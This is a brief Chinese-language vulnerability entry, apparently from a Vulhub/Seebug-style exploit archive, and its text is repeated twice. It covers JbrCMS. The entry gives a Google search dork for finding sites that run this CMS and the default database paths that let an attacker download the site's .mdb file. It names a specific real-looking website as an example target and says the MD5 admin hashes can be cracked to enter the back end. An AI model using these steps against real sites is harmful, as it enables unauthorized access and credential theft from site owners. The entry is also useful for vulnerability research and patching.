VULHUB ™

<p>1.google关键字&nbsp;</p><p>inurl:_jbrcms</p><p>2.多数网站没有改默认数据库位置，导致数据库可被下载</p><p>e.g.:&nbsp;<a href="http://www.zjyzkf.com/_jbrcms/%23JbrCMSDB/%23JbrData.mdb" rel="nofollow">www.zjyzkf.com/_jbrcms/%23JbrCMSDB/%23JbrData.mdb</a></p><p>密码为md5加密，破解后可进入后台</p><p><br></p><p>漏洞利用过程</p><p>访问域名加上下列地址</p><p>/_jbrcms/%23JbrCMSDB/%23JbrData.mdb</p><p>/%23JbrCMSDB/%23JbrData.mdb&nbsp;</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434696216704-1.png" data-image-size="865,443"><br></p>

<p>1.google关键字&nbsp;</p><p>inurl:_jbrcms</p><p>2.多数网站没有改默认数据库位置，导致数据库可被下载</p><p>e.g.:&nbsp;<a href="http://www.zjyzkf.com/_jbrcms/%23JbrCMSDB/%23JbrData.mdb" rel="nofollow">www.zjyzkf.com/_jbrcms/%23JbrCMSDB/%23JbrData.mdb</a></p><p>密码为md5加密，破解后可进入后台</p><p><br></p><p>漏洞利用过程</p><p>访问域名加上下列地址</p><p>/_jbrcms/%23JbrCMSDB/%23JbrData.mdb</p><p>/%23JbrCMSDB/%23JbrData.mdb&nbsp;</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434696216704-1.png" data-image-size="865,443"><br></p>